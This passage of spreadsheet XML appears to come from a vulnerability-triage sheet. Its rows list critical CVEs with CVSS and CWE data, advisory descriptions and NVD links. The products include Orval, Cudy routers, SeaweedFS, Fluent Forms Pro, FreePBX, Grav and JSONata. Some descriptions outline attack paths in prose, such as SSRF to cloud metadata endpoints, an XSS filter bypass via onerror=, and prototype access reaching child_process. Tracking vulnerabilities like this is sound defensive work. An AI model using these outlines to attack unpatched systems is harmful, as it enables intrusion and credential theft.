          <t>Orval generates type-safe JavaScript clients in TypeScript from OpenAPI v3 and Swagger v2 specifications. Prior to 8.21.0, a ${...} expression or backtick in a header parameter default is emitted into a module-level template literal emitted by zod schema generation without safe encoding. This permits attacker-controlled JavaScript to be evaluated when the generated zod schema module is imported, resulting in code execution in the developer, CI, test, or application environment. The affected code is packages/zod/src/index.ts function formatDefaultValue. This issue is fixed in version 8.21.0.</t>
        </is>
      </c>
      <c r="M468" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71871</t>
        </is>
      </c>
    </row>
    <row r="469">
      <c r="A469" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B469" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71960</t>
        </is>
      </c>
      <c r="C469" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D469" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E469" s="5" t="inlineStr"/>
      <c r="F469" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G469" s="5" t="inlineStr"/>
      <c r="H469" s="5" t="inlineStr"/>
      <c r="I469" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J469" s="5" t="inlineStr"/>
      <c r="K469" s="5" t="inlineStr">
        <is>
          <t>CWE-798</t>
        </is>
      </c>
      <c r="L469" s="5" t="inlineStr">
        <is>
          <t>Cudy WR3000 2.0 running firmware before 2.5.24 contains a hard-coded JWT HMAC signing secret vulnerability in the Mosquitto MQTT broker's authentication plugin that allows unauthenticated attackers to forge valid JWT tokens by extracting the secret from the firmware image. Attackers can use the extracted secret to craft arbitrary JWT tokens and authenticate to the MQTT broker without legitimate credentials, gaining unauthorized access to the device's mesh networking interface.</t>
        </is>
      </c>
      <c r="M469" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71960</t>
        </is>
      </c>
    </row>
    <row r="470">
      <c r="A470" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B470" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72716</t>
        </is>
      </c>
      <c r="C470" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D470" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E470" s="5" t="inlineStr"/>
      <c r="F470" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G470" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H470" s="5" t="inlineStr"/>
      <c r="I470" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J470" s="5" t="inlineStr"/>
      <c r="K470" s="5" t="inlineStr">
        <is>
          <t>CWE-1336</t>
        </is>
      </c>
      <c r="L470" s="5" t="inlineStr">
        <is>
          <t>Orval generates type-safe JavaScript clients in TypeScript from OpenAPI v3 and Swagger v2 specifications. Prior to 8.21.0, a ${...} expression or backtick in a query parameter default is emitted into a module-level template literal emitted by zod schema generation without safe encoding. This permits attacker-controlled JavaScript to be evaluated when the generated zod schema module is imported, resulting in code execution in the developer, CI, test, or application environment. The affected code is packages/zod/src/index.ts function formatDefaultValue. This issue is fixed in version 8.21.0.</t>
        </is>
      </c>
      <c r="M470" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72716</t>
        </is>
      </c>
    </row>
    <row r="471">
      <c r="A471" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B471" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72717</t>
        </is>
      </c>
      <c r="C471" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D471" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E471" s="5" t="inlineStr"/>
      <c r="F471" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G471" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H471" s="5" t="inlineStr"/>
      <c r="I471" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J471" s="5" t="inlineStr"/>
      <c r="K471" s="5" t="inlineStr">
        <is>
          <t>CWE-116, CWE-1336, CWE-94</t>
        </is>
      </c>
      <c r="L471" s="5" t="inlineStr">
        <is>
          <t>Orval generates type-safe JavaScript clients in TypeScript from OpenAPI v3 and Swagger v2 specifications. Prior to 8.21.0, a ${...} expression or backtick in a schema default is emitted into a module-level template literal emitted by zod schema generation without safe encoding. This permits attacker-controlled JavaScript to be evaluated when the generated zod schema module is imported, resulting in code execution in the developer, CI, test, or application environment. The affected code is packages/zod/src/index.ts function formatDefaultValue. This issue is fixed in version 8.21.0.</t>
        </is>
      </c>
      <c r="M471" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72717</t>
        </is>
      </c>
    </row>
    <row r="472">
      <c r="A472" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B472" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72839</t>
        </is>
      </c>
      <c r="C472" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D472" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E472" s="5" t="inlineStr"/>
      <c r="F472" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G472" s="5" t="inlineStr"/>
      <c r="H472" s="5" t="inlineStr"/>
      <c r="I472" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J472" s="5" t="inlineStr"/>
      <c r="K472" s="5" t="inlineStr">
        <is>
          <t>CWE-266</t>
        </is>
      </c>
      <c r="L472" s="5" t="inlineStr">
        <is>
          <t>filebrowser through 2.63.16 fails to properly restrict scope and permissions when self-signup is enabled with default CreateUserDir setting. Unauthenticated attackers can register accounts that inherit the server root scope with full create, modify, delete, rename, share, and download permissions, allowing unrestricted access to all files.</t>
        </is>
      </c>
      <c r="M472" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72839</t>
        </is>
      </c>
    </row>
    <row r="473">
      <c r="A473" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B473" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73080</t>
        </is>
      </c>
      <c r="C473" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D473" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E473" s="5" t="inlineStr"/>
      <c r="F473" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G473" s="5" t="inlineStr"/>
      <c r="H473" s="5" t="inlineStr"/>
      <c r="I473" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J473" s="5" t="inlineStr"/>
      <c r="K473" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L473" s="5" t="inlineStr">
        <is>
          <t>SeaweedFS is a distributed storage system. Prior to 4.24, VolumeServer.FetchAndWriteNeedle in weed/server/volume_grpc_remote.go fetches a caller-supplied remote endpoint through weed/remote_storage/s3/s3_storage_client.go and writes the response into a needle. The RPC performs no authentication and no target validation, allowing anyone who can reach a volume server's gRPC port to cause requests to arbitrary hosts, including loopback, link-local, RFC 1918, and cloud metadata endpoints such as 169.254.169.254, and read the response. On cloud deployments, this can disclose instance metadata and IAM credentials and reach otherwise unexposed internal services. The volume server gRPC plane is unauthenticated by default, and configuring documented JWT signing keys does not protect this RPC. This issue is fixed in version 4.24.</t>
        </is>
      </c>
      <c r="M473" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73080</t>
        </is>
      </c>
    </row>
    <row r="474">
      <c r="A474" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B474" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73090</t>
        </is>
      </c>
      <c r="C474" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D474" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E474" s="5" t="inlineStr"/>
      <c r="F474" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G474" s="5" t="inlineStr"/>
      <c r="H474" s="5" t="inlineStr"/>
      <c r="I474" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J474" s="5" t="inlineStr"/>
      <c r="K474" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L474" s="5" t="inlineStr">
        <is>
          <t>PeerTube is an ActivityPub-federated video streaming platform. Prior to 8.2.2, processUpdateActivity and processUpdateVideo accept an ActivityPub Update containing a Video object without verifying that byActor.url is authorized for the host in videoObject.id, allowing a malicious federated server to rewrite another server's video metadata, visibility, media file, and HLS URLs. This issue is fixed in version 8.2.2.</t>
        </is>
      </c>
      <c r="M474" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73090</t>
        </is>
      </c>
    </row>
    <row r="475">
      <c r="A475" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B475" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73251</t>
        </is>
      </c>
      <c r="C475" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D475" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E475" s="5" t="inlineStr"/>
      <c r="F475" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G475" s="5" t="inlineStr"/>
      <c r="H475" s="5" t="inlineStr"/>
      <c r="I475" s="5" t="inlineStr">
        <is>
          <t>2026-08-20</t>
        </is>
      </c>
      <c r="J475" s="5" t="inlineStr"/>
      <c r="K475" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="L475" s="5" t="inlineStr">
        <is>
          <t>Mongoose is an embedded web server and network library. Prior to 7.23, a network attacker can impersonate a TLS server to a Mongoose client configured with a multi-certificate CA bundle. In src/tls_builtin.c, the mg_tls_init() function stores the bundle in tls-&gt;ca_bundle_der while tls-&gt;ca_der.len remains zero, and mg_tls_recv_cert() uses tls_bundle_find() to accept a Common Name match without calling mg_tls_verify_cert_signature(). A forged self-signed certificate can therefore satisfy hostname and CertificateVerify checks and enable interception, credential disclosure, traffic modification, and malicious responses. This issue is fixed in version 7.23.</t>
        </is>
      </c>
      <c r="M475" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73251</t>
        </is>
      </c>
    </row>
    <row r="476">
      <c r="A476" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B476" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73532</t>
        </is>
      </c>
      <c r="C476" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D476" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E476" s="5" t="inlineStr"/>
      <c r="F476" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G476" s="5" t="inlineStr"/>
      <c r="H476" s="5" t="inlineStr"/>
      <c r="I476" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J476" s="5" t="inlineStr"/>
      <c r="K476" s="5" t="inlineStr">
        <is>
          <t>CWE-506</t>
        </is>
      </c>
      <c r="L476" s="5" t="inlineStr">
        <is>
          <t>Fluent Forms Pro 6.2.7 contains an embedded malicious code vulnerability introduced via a tampered plugin build served through a decommissioned update server. The tampered build introduced a rogue PHP file (libs/class-license-sync.php), loaded via a require_once directive added to fluentformpro.php, that established a backdoor REST API endpoint, dropped persistent PHP files in mu-plugins and uploads directories, installed a passwordless administrator account, and registered scheduled tasks that survived plugin removal.</t>
        </is>
      </c>
      <c r="M476" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73532</t>
        </is>
      </c>
    </row>
    <row r="477">
      <c r="A477" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B477" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73533</t>
        </is>
      </c>
      <c r="C477" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D477" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E477" s="5" t="inlineStr"/>
      <c r="F477" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G477" s="5" t="inlineStr"/>
      <c r="H477" s="5" t="inlineStr"/>
      <c r="I477" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J477" s="5" t="inlineStr"/>
      <c r="K477" s="5" t="inlineStr">
        <is>
          <t>CWE-506</t>
        </is>
      </c>
      <c r="L477" s="5" t="inlineStr">
        <is>
          <t>Ninja Tables Pro 5.2.11 contains an embedded malicious code vulnerability introduced via a tampered plugin build served through a decommissioned update server. The tampered build introduced a rogue PHP file (app/Library/updater/NinjaTableDataSync.php) that established a backdoor REST API endpoint, dropped persistent PHP files in mu-plugins and uploads directories, installed a passwordless administrator account, and registered scheduled tasks that survived plugin removal.</t>
        </is>
      </c>
      <c r="M477" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73533</t>
        </is>
      </c>
    </row>
    <row r="478">
      <c r="A478" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B478" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73665</t>
        </is>
      </c>
      <c r="C478" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D478" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E478" s="5" t="inlineStr"/>
      <c r="F478" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G478" s="5" t="inlineStr"/>
      <c r="H478" s="5" t="inlineStr"/>
      <c r="I478" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J478" s="5" t="inlineStr"/>
      <c r="K478" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L478" s="5" t="inlineStr">
        <is>
          <t>FreePBX is an open source IP PBX. Prior to 17.0.9, the UCP Node server on ports 8001 and 8003 uses io.use(checkAuth) in node/lib/server.js, but Socket.IO version 4 applies that middleware only to the default namespace. An unauthenticated client can connect to custom namespaces that do not consistently invoke checkAuth in node/lib/auth.js and send crafted event values containing carriage-return or newline characters through the Asterisk Manager Interface action path patched by node/lib/asterisk-manager-patch.js, allowing arbitrary commands to execute as the asterisk service user. This issue is fixed in version 17.0.9.</t>
        </is>
      </c>
      <c r="M478" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73665</t>
        </is>
      </c>
    </row>
    <row r="479">
      <c r="A479" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B479" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75827</t>
        </is>
      </c>
      <c r="C479" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D479" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E479" s="5" t="inlineStr"/>
      <c r="F479" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G479" s="5" t="inlineStr"/>
      <c r="H479" s="5" t="inlineStr"/>
      <c r="I479" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J479" s="5" t="inlineStr"/>
      <c r="K479" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L479" s="5" t="inlineStr">
        <is>
          <t>Grav before 2.0.15 contains an arbitrary file write vulnerability in the Blueprint dynamic-data bare-function validation that uses an incomplete denylist instead of a positive allowlist. Attackers with page-edit or blueprint-config access can invoke the error_log function through a data directive to append PHP payloads to web-accessible files, achieving remote code execution.</t>
        </is>
      </c>
      <c r="M479" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75827</t>
        </is>
      </c>
    </row>
    <row r="480">
      <c r="A480" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B480" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75828</t>
        </is>
      </c>
      <c r="C480" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D480" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E480" s="5" t="inlineStr"/>
      <c r="F480" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G480" s="5" t="inlineStr"/>
      <c r="H480" s="5" t="inlineStr"/>
      <c r="I480" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J480" s="5" t="inlineStr"/>
      <c r="K480" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L480" s="5" t="inlineStr">
        <is>
          <t>Grav before 2.0.15 contains a stored cross-site scripting vulnerability in the detectXss() function where unpaired quotes in unquoted attribute values bypass event-handler detection. Authenticated editors can inject event handlers like onerror= that pass validation and execute in visitor browsers when page content is rendered.</t>
        </is>
      </c>
      <c r="M480" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75828</t>
        </is>
      </c>
    </row>
    <row r="481">
      <c r="A481" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B481" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75832</t>
        </is>
      </c>
      <c r="C481" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D481" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E481" s="5" t="inlineStr"/>
      <c r="F481" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G481" s="5" t="inlineStr"/>
      <c r="H481" s="5" t="inlineStr"/>
      <c r="I481" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J481" s="5" t="inlineStr"/>
      <c r="K481" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L481" s="5" t="inlineStr">
        <is>
          <t>The Grav API plugin (getgrav/grav-plugin-api, bundled with Grav 2.0) before version 1.0.14 (fixed in 1.0.15) contains a missing authorization vulnerability in BlueprintPathResolver::resolveUserScope(). The method gates the users/&lt;name&gt; scope on the account's raw super-admin ACL flag (access.api.super) instead of validating the presented API key's actual scope. An attacker holding an API key scoped only to api.media.write minted on a super-admin account can bypass the authorization check and, via POST /blueprint-upload or GET /blueprint-files, write a file into another user's scope (in the shared user/accounts/ directory, constrained to image extensions by assertSafeExtension()) and browse that scope's file listing, despite the key not being granted api.users.write.</t>
        </is>
      </c>
      <c r="M481" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75832</t>
        </is>
      </c>
    </row>
    <row r="482">
      <c r="A482" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B482" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75835</t>
        </is>
      </c>
      <c r="C482" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D482" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E482" s="5" t="inlineStr"/>
      <c r="F482" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G482" s="5" t="inlineStr"/>
      <c r="H482" s="5" t="inlineStr"/>
      <c r="I482" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J482" s="5" t="inlineStr"/>
      <c r="K482" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L482" s="5" t="inlineStr">
        <is>
          <t>Grav API plugin (getgrav/grav-plugin-api) before 1.0.14 contains a missing authorization vulnerability in userPassesAuthorize() (AbstractApiController.php). The function fails to consult the calling request's API key scopes, relying instead on the account's raw super-admin flag and ACL grants. As a result, an authenticated attacker holding a scoped API key minted on a privileged account can bypass their declared scope restrictions to access authorize-gated UI metadata and item definitions (sidebar/menubar/widget items and users-list columns/row-actions/filter-tabs) that their key scope should deny, resulting in information disclosure.</t>
        </is>
      </c>
      <c r="M482" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75835</t>
        </is>
      </c>
    </row>
    <row r="483">
      <c r="A483" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B483" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75837</t>
        </is>
      </c>
      <c r="C483" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D483" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E483" s="5" t="inlineStr"/>
      <c r="F483" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G483" s="5" t="inlineStr"/>
      <c r="H483" s="5" t="inlineStr"/>
      <c r="I483" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J483" s="5" t="inlineStr"/>
      <c r="K483" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="L483" s="5" t="inlineStr">
        <is>
          <t>Grav before 2.0.14 fails to guard the access field in the core group blueprint with the required security@: admin.super restriction. A delegated admin.users operator can save a group with access[admin][super]=true to escalate to super-admin, gaining scheduler and Twig evaluation capabilities.</t>
        </is>
      </c>
      <c r="M483" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75837</t>
        </is>
      </c>
    </row>
    <row r="484">
      <c r="A484" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B484" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75854</t>
        </is>
      </c>
      <c r="C484" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D484" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E484" s="5" t="inlineStr"/>
      <c r="F484" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="G484" s="5" t="inlineStr">
        <is>
          <t>redis</t>
        </is>
      </c>
      <c r="H484" s="5" t="inlineStr"/>
      <c r="I484" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J484" s="5" t="inlineStr"/>
      <c r="K484" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L484" s="5" t="inlineStr">
        <is>
          <t>ArcadeDB versions before 26.8.1 contain a missing authentication vulnerability in the Redis wire-protocol plugin that allows unauthenticated attackers to read, write, and delete data. Attackers can connect to the Redis port and execute arbitrary commands against any database on the server without providing credentials, bypassing all security gates.</t>
        </is>
      </c>
      <c r="M484" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75854</t>
        </is>
      </c>
    </row>
    <row r="485">
      <c r="A485" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B485" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75940</t>
        </is>
      </c>
      <c r="C485" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D485" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E485" s="5" t="inlineStr"/>
      <c r="F485" s="5" t="inlineStr"/>
      <c r="G485" s="5" t="inlineStr"/>
      <c r="H485" s="5" t="inlineStr"/>
      <c r="I485" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J485" s="5" t="inlineStr"/>
      <c r="K485" s="5" t="inlineStr">
        <is>
          <t>CWE-798</t>
        </is>
      </c>
      <c r="L485" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was reported in Lenovo Health Android Application, distributed exclusively in the Chinese market, that could allow an attacker to access sensitive health-related information.</t>
        </is>
      </c>
      <c r="M485" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75940</t>
        </is>
      </c>
    </row>
    <row r="486">
      <c r="A486" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B486" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76200</t>
        </is>
      </c>
      <c r="C486" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D486" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E486" s="5" t="inlineStr"/>
      <c r="F486" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G486" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H486" s="5" t="inlineStr">
        <is>
          <t>adobe:commerce, adobe:commerce_b2b, adobe:magento</t>
        </is>
      </c>
      <c r="I486" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J486" s="5" t="inlineStr"/>
      <c r="K486" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L486" s="5" t="inlineStr">
        <is>
          <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M486" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76200</t>
        </is>
      </c>
    </row>
    <row r="487">
      <c r="A487" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B487" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76201</t>
        </is>
      </c>
      <c r="C487" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D487" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E487" s="5" t="inlineStr"/>
      <c r="F487" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G487" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H487" s="5" t="inlineStr">
        <is>
          <t>adobe:commerce, adobe:commerce_b2b, adobe:magento</t>
        </is>
      </c>
      <c r="I487" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J487" s="5" t="inlineStr"/>
      <c r="K487" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L487" s="5" t="inlineStr">
        <is>
          <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M487" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76201</t>
        </is>
      </c>
    </row>
    <row r="488">
      <c r="A488" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B488" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77089</t>
        </is>
      </c>
      <c r="C488" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D488" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E488" s="5" t="inlineStr"/>
      <c r="F488" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G488" s="5" t="inlineStr"/>
      <c r="H488" s="5" t="inlineStr"/>
      <c r="I488" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J488" s="5" t="inlineStr"/>
      <c r="K488" s="5" t="inlineStr">
        <is>
          <t>CWE-290</t>
        </is>
      </c>
      <c r="L488" s="5" t="inlineStr">
        <is>
          <t>Command Center API contained an authentication bypass issue affecting privilege management. Software customers upgrade to resolved maintenance release. Update Command Center.</t>
        </is>
      </c>
      <c r="M488" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77089</t>
        </is>
      </c>
    </row>
    <row r="489">
      <c r="A489" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B489" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77413</t>
        </is>
      </c>
      <c r="C489" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D489" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E489" s="5" t="inlineStr"/>
      <c r="F489" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G489" s="5" t="inlineStr"/>
      <c r="H489" s="5" t="inlineStr"/>
      <c r="I489" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="J489" s="5" t="inlineStr"/>
      <c r="K489" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L489" s="5" t="inlineStr">
        <is>
          <t>JSONata is a JSON query and transformation language. Prior to 1.8.8 and 2.2.0, the src/functions.js lookup function lacked an Object.prototype.hasOwnProperty check and allowed crafted expressions to access inherited prototype members. An attacker able to supply an expression could use inherited prototype setters and getters, constructor access, valueOf, and process.getBuiltinModule to reach the child_process module and execute arbitrary code with the privileges of the host process. This issue is fixed in versions 1.8.8 and 2.2.0.</t>
        </is>
      </c>
      <c r="M489" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77413</t>
        </is>
      </c>
